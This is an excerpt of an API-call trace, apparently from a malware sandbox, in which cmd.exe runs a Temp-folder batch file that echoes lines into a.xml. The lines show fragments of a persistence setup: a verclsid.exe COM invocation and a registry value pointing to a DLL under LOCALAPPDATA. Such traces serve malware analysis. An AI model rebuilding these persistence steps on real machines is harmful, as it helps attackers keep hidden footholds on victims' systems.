[0378.663] SetFilePointer (in: hFile=0x64, lDistanceToMove=2446, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98e
[0378.663] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=31, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nME%\"^> >> %temp%\\a.xml\r\n>> %temp%\\a.xml\r\n%\\a.xml\r\n\\a.xml\r\n^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 31
[0378.663] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.664] GetFileType (hFile=0x64) returned 0x1
[0378.664] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.664] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98e
[0378.664] GetProcessHeap () returned 0x200000
[0378.664] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2373d0
[0378.665] GetProcessHeap () returned 0x200000
[0378.665] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x23b3f0
[0378.665] GetProcessHeap () returned 0x200000
[0378.665] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.665] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.665] GetProcessHeap () returned 0x200000
[0378.665] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.665] GetProcessHeap () returned 0x200000
[0378.666] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x23b3f0 | out: hHeap=0x200000) returned 1
[0378.666] GetProcessHeap () returned 0x200000
[0378.666] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373d0 | out: hHeap=0x200000) returned 1
[0378.667] _tell (_FileHandle=3) returned 2446
[0378.667] _close (_FileHandle=3) returned 0
[0378.667] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.668] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.668] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.668] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.668] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.668] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.668] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.668] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.668] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.669] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.669] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.669] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.669] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.669] GetFileType (hFile=0x7) returned 0x2
[0378.670] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.670] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.673] _dup (_FileHandle=1) returned 3
[0378.674] _close (_FileHandle=1) returned 0
[0378.676] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.676] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.676] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.676] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.676] GetFileType (hFile=0x64) returned 0x1
[0378.676] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x490
[0378.677] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x48f
[0378.677] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.677] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.678] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x216d70, Size=0x20) returned 0x21b120
[0378.678] GetProcessHeap () returned 0x200000
[0378.678] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21b120) returned 0x20
[0378.678] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 9
[0378.678] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.678] GetFileType (hFile=0x64) returned 0x1
[0378.678] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.678] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 10
[0378.679] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x9, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x9, lpOverlapped=0x0) returned 1
[0378.679] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.682] _close (_FileHandle=3) returned 0
[0378.683] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.683] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.684] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.684] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.684] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.685] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.685] SetConsoleInputExeNameW () returned 0x1
[0378.685] GetConsoleOutputCP () returned 0x1b5
[0378.686] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.686] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.687] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.687] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.688] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.688] SetFilePointer (in: hFile=0x64, lDistanceToMove=2446, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98e
[0378.688] GetProcessHeap () returned 0x200000
[0378.688] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d70 | out: hHeap=0x200000) returned 1
[0378.688] GetProcessHeap () returned 0x200000
[0378.688] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b120 | out: hHeap=0x200000) returned 1
[0378.689] GetProcessHeap () returned 0x200000
[0378.689] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b150 | out: hHeap=0x200000) returned 1
[0378.689] GetProcessHeap () returned 0x200000
[0378.689] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.689] GetProcessHeap () returned 0x200000
[0378.689] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.689] GetProcessHeap () returned 0x200000
[0378.689] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.689] GetProcessHeap () returned 0x200000
[0378.689] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.689] GetProcessHeap () returned 0x200000
[0378.689] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x235400 | out: hHeap=0x200000) returned 1
[0378.690] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.690] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98e
[0378.690] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x5a4, lpOverlapped=0x0) returned 1
[0378.690] SetFilePointer (in: hFile=0x64, lDistanceToMove=2506, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ca
[0378.690] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^\"verclsid.exe\"^ >> %temp%\\a.xml\r\n", cbMultiByte=60, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^\"verclsid.exe\"^ >> %temp%\\a.xml\r\nemp%\\a.xml\r\n%\\a.xml\r\n\\a.xml\r\n^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 60
[0378.690] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.690] GetFileType (hFile=0x64) returned 0x1
[0378.690] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.691] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ca
[0378.691] GetProcessHeap () returned 0x200000
[0378.691] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2373d0
[0378.691] GetProcessHeap () returned 0x200000
[0378.691] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x23b3f0
[0378.691] GetProcessHeap () returned 0x200000
[0378.691] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.691] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.691] GetProcessHeap () returned 0x200000
[0378.691] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.691] GetProcessHeap () returned 0x200000
[0378.692] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x23b3f0 | out: hHeap=0x200000) returned 1
[0378.692] GetProcessHeap () returned 0x200000
[0378.692] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373d0 | out: hHeap=0x200000) returned 1
[0378.692] _tell (_FileHandle=3) returned 2506
[0378.693] _close (_FileHandle=3) returned 0
[0378.693] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.693] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.693] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.693] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.693] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.693] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.693] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.693] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.693] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.693] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.693] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.693] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.693] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.693] GetFileType (hFile=0x7) returned 0x2
[0378.694] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.694] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.695] _dup (_FileHandle=1) returned 3
[0378.696] _close (_FileHandle=1) returned 0
[0378.697] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.697] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.697] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.697] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.697] GetFileType (hFile=0x64) returned 0x1
[0378.697] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x499
[0378.697] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x498
[0378.697] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.697] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.698] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x237400, Size=0x5a) returned 0x201de0
[0378.698] GetProcessHeap () returned 0x200000
[0378.698] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x201de0) returned 0x5a
[0378.698] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer="\"verclsid.exe\" \r\n") returned 36
[0378.698] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.698] GetFileType (hFile=0x64) returned 0x1
[0378.698] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.698] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\"verclsid.exe\" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\"verclsid.exe\" \r\n", lpUsedDefaultChar=0x0) returned 37
[0378.698] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x24, lpOverlapped=0x0) returned 1
[0378.699] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.700] _close (_FileHandle=3) returned 0
[0378.701] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.701] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.702] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.702] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.702] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.702] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.703] SetConsoleInputExeNameW () returned 0x1
[0378.703] GetConsoleOutputCP () returned 0x1b5
[0378.703] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.703] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.704] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.704] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.704] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.704] SetFilePointer (in: hFile=0x64, lDistanceToMove=2506, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ca
[0378.704] GetProcessHeap () returned 0x200000
[0378.704] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.704] GetProcessHeap () returned 0x200000
[0378.705] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201de0 | out: hHeap=0x200000) returned 1
[0378.705] GetProcessHeap () returned 0x200000
[0378.705] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.705] GetProcessHeap () returned 0x200000
[0378.705] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.705] GetProcessHeap () returned 0x200000
[0378.705] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.705] GetProcessHeap () returned 0x200000
[0378.705] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f4a0 | out: hHeap=0x200000) returned 1
[0378.705] GetProcessHeap () returned 0x200000
[0378.705] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.705] GetProcessHeap () returned 0x200000
[0378.705] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x235400 | out: hHeap=0x200000) returned 1
[0378.706] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.706] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ca
[0378.706] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x568, lpOverlapped=0x0) returned 1
[0378.706] SetFilePointer (in: hFile=0x64, lDistanceToMove=2600, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa28
[0378.706] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}^ >> %temp%\\a.xml\r\n", cbMultiByte=94, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}^ >> %temp%\\a.xml\r\n %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 94
[0378.706] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.706] GetFileType (hFile=0x64) returned 0x1
[0378.707] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.707] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa28
[0378.707] GetProcessHeap () returned 0x200000
[0378.707] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2393d0
[0378.707] GetProcessHeap () returned 0x200000
[0378.707] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x23d3f0
[0378.707] GetProcessHeap () returned 0x200000
[0378.707] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.707] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.707] GetProcessHeap () returned 0x200000
[0378.707] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.708] GetProcessHeap () returned 0x200000
[0378.708] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x23d3f0 | out: hHeap=0x200000) returned 1
[0378.708] GetProcessHeap () returned 0x200000
[0378.708] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2393d0 | out: hHeap=0x200000) returned 1
[0378.709] _tell (_FileHandle=3) returned 2600
[0378.709] _close (_FileHandle=3) returned 0
[0378.709] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.709] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.709] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.709] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.709] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.709] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.709] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.709] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.709] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.709] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.710] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.710] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.710] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.710] GetFileType (hFile=0x7) returned 0x2
[0378.710] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.710] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.711] _dup (_FileHandle=1) returned 3
[0378.712] _close (_FileHandle=1) returned 0
[0378.713] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.713] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.713] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.713] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.713] GetFileType (hFile=0x64) returned 0x1
[0378.713] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4bd
[0378.713] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x4bc
[0378.713] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.714] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.714] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x220470, Size=0xa4) returned 0x220470
[0378.714] GetProcessHeap () returned 0x200000
[0378.714] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x220470) returned 0xa4
[0378.714] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer="/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} \r\n") returned 70
[0378.714] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.714] GetFileType (hFile=0x64) returned 0x1
[0378.714] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.714] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} \r\n", lpUsedDefaultChar=0x0) returned 71
[0378.715] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x46, lpOverlapped=0x0) returned 1
[0378.715] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.717] _close (_FileHandle=3) returned 0
[0378.718] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.718] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.718] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.719] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.719] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.719] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.720] SetConsoleInputExeNameW () returned 0x1
[0378.720] GetConsoleOutputCP () returned 0x1b5
[0378.720] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.720] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.721] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.721] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.721] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.721] SetFilePointer (in: hFile=0x64, lDistanceToMove=2600, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa28
[0378.721] GetProcessHeap () returned 0x200000
[0378.721] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2374b0 | out: hHeap=0x200000) returned 1
[0378.721] GetProcessHeap () returned 0x200000
[0378.722] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x220470 | out: hHeap=0x200000) returned 1
[0378.722] GetProcessHeap () returned 0x200000
[0378.722] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.722] GetProcessHeap () returned 0x200000
[0378.722] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.722] GetProcessHeap () returned 0x200000
[0378.722] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.723] GetProcessHeap () returned 0x200000
[0378.723] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x237400 | out: hHeap=0x200000) returned 1
[0378.723] GetProcessHeap () returned 0x200000
[0378.723] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.723] GetProcessHeap () returned 0x200000
[0378.723] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x235400 | out: hHeap=0x200000) returned 1
[0378.723] _get_osfhandle (_FileHandle=3) returned 0x64
